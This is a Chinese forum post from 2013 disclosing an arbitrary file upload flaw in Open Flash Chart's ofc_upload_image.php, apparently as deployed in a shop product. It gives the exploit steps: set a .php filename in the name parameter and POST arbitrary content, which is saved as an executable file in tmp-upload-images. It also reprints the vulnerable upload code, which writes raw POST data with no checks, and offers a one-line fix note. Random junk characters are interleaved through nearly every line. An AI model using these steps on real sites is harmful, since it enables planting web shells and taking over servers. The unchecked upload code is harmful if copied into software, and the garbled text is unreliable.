POST 数据漏洞文件执行任意后缀文件保存
' w3 ^# ]$ v( B T8 K 漏洞文件/chart/php-ofc-library/ofc_upload_image.php! M& g3 M+ i1 B
( S. J% `1 G) n! ?7 C# s) Q
利用:
: k; ^6 y# h) L! j/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
1 o, P* {. B! c1 ?5 J8 G# V3 m2 N" z
' g* b9 f8 p# L+ y& k" B- }) W, JPost任意数据
8 y; }# ?. a3 J% I% {- C保存位置http://localhost/chart/tmp-upload-images/hfy.php& d6 A$ ]- E7 ^, B. _! p/ z
$ J1 |) g; E [* U$ _5 ^
- `: I, }0 [8 D* j% ]7 t0 j w: N最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~) Z+ A* _. D, W8 B1 |% c! x
: S0 `9 u7 [+ ]
<?php
$ i; Q: `8 r# p; p) @4 [
% O% A! `( y( T# d. D//! _/ D/ p' j( x4 b
// In Open Flash Chart -> save_image debug mode, you" b8 Y4 Z/ ]5 ?0 h V
// will see the 'echo' text in a new window.
7 H- o5 I* r" b. E+ w$ k& l- c//" p# k3 C) p" J8 x3 `! _" M2 g
* R& N: Y3 S! G6 c3 L. L+ }4 |
/*; c7 S, Q8 G8 f
# p1 R' o4 B7 @: y3 ]( z2 ]0 N
print_r( $_GET );
/ p4 S( n: [; Eprint_r( $_POST );; s2 W ~1 |. m% U0 ]
print_r( $_FILES );
3 D/ e6 t( i O e4 C" P' e8 V+ `8 |" B
print_r( $GLOBALS );- c0 Z+ f# Q+ S. Q% l( Q3 B* B6 l
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
! j8 D* s# m5 ?' e( t7 s b: R6 } J) ~7 M8 h+ ^$ G6 C( U
*/
1 f) ]) B# I5 s1 n& ~0 K" [ r// default path for the image to be stored //0 O$ v! W/ `6 g' O0 u/ o6 U& ~7 H
$default_path = '../tmp-upload-images/';
6 C" f: Z0 t# Z2 x3 X* {- f. s0 w
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
3 Q6 n2 C4 d# t1 S
2 ^. x( v: B/ @% Z' G% d// full path to the saved image including filename //7 O' R$ x8 u6 |" v% d. x
$destination = $default_path . basename( $_GET[ 'name' ] );
& a( M/ G3 m- k& z& z% S' D
; a- n. d3 V+ W5 X5 ] _' zecho 'Saving your image to: '. $destination;
* S5 D& h& j% g// print_r( $_POST );
: S, u! b. U- E% p// print_r( $_SERVER );" e& m& M* o4 |, d* o
// echo $HTTP_RAW_POST_DATA;9 b3 }/ h! u0 i# ]9 h
& d1 n8 a1 t5 b+ }1 u$ k/ G//
D: k5 n5 {* M' ]2 ?" D) X// POST data is usually string data, but we are passing a RAW .png" A% H' X2 B+ S5 N# Q7 N$ a
// so PHP is a bit confused and $_POST is empty. But it has saved4 H* s. a4 q1 S* e+ N) L7 T
// the raw bits into $HTTP_RAW_POST_DATA
5 ?2 I# d# _% r* Q3 x* |//) G" U! i; Z1 ]. ~) H( ]4 P: t
# e4 S# q. m- g! c; U0 Y$ O: o
$jfh = fopen($destination, 'w') or die("can't open file");
$ C' [7 l; B. a3 b/ Rfwrite($jfh, $HTTP_RAW_POST_DATA);
' s# P% r3 a$ }% @3 a z6 u; \fclose($jfh);% q8 Y) `1 A1 A$ u6 r$ O3 }
( v7 j+ P+ u$ J* _$ p( V8 c//
1 D1 W% m5 z: N3 u2 [// LOOK:* q8 q- x) A! [% H; ^
//" I, Q2 K% y+ U) w$ S, ^5 B
exit();
. `" h2 t2 y G" B//
) C0 I& X& }3 ~7 v& y// PHP5:! N( n3 o( z" [ v
//% s" F/ A6 x8 g4 m
8 g2 u5 _7 }- }7 n5 R4 |9 |% [5 i3 K* c+ Z) c
// default path for the image to be stored //
; A( N0 ^/ h U/ B$default_path = 'tmp-upload-images/';
. i: {1 U5 u% N+ R }0 E2 Y: @! ~! E% P+ U
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
, C0 \+ k1 F2 |- t1 m* D5 W
3 \# K+ w9 u3 x) C+ W// full path to the saved image including filename //
% c# F2 W+ a/ d. \1 f$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); # [/ h2 W! ^- P9 ^3 w9 b
w- p- w+ m/ [1 x
// move the image into the specified directory // `9 @6 |& c, K5 ]
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {+ g6 |, ]4 T: B! |* E u
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
: [, s4 Y# u7 A/ Q* T} else {
O: c8 V- h R3 v/ U7 _0 l echo "FILE UPLOAD FAILED";
9 r2 d7 B: t& ^* L' Z! E}
7 d% E* i! f& p2 y5 x' L% n* y4 N
+ v1 T: R" P* g" z3 {- U7 }; A1 T: T7 q3 }6 z! v5 k" b6 Y
?>
1 H) O: k' t) A' u7 G6 A
, j. H$ b% v0 S( Y8 `* V
" W3 A5 _7 [) g: q/ \0 Y M( y! K o0 @: v1 l/ s& [1 D% t/ m
7 p7 e5 @6 J5 v! R, T- z, a
w) Z: n& J/ M& o
& I0 A1 Y; }8 c. f修复方案:
7 P9 S- a* Z Y3 ]这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 : h( E. ?$ l4 ^$ g0 |" R& e6 z6 V
: z! W. F) `! t; {5 R. [8 f( X# w
+ _- a/ C* S4 J6 T2 |7 m8 |% O5 e% c# V. m1 C9 H7 L, Q- @% K
$ q# m( y2 A9 c* S' k
|
发表于 2013-2-23 12:38:58
收藏
支持
反对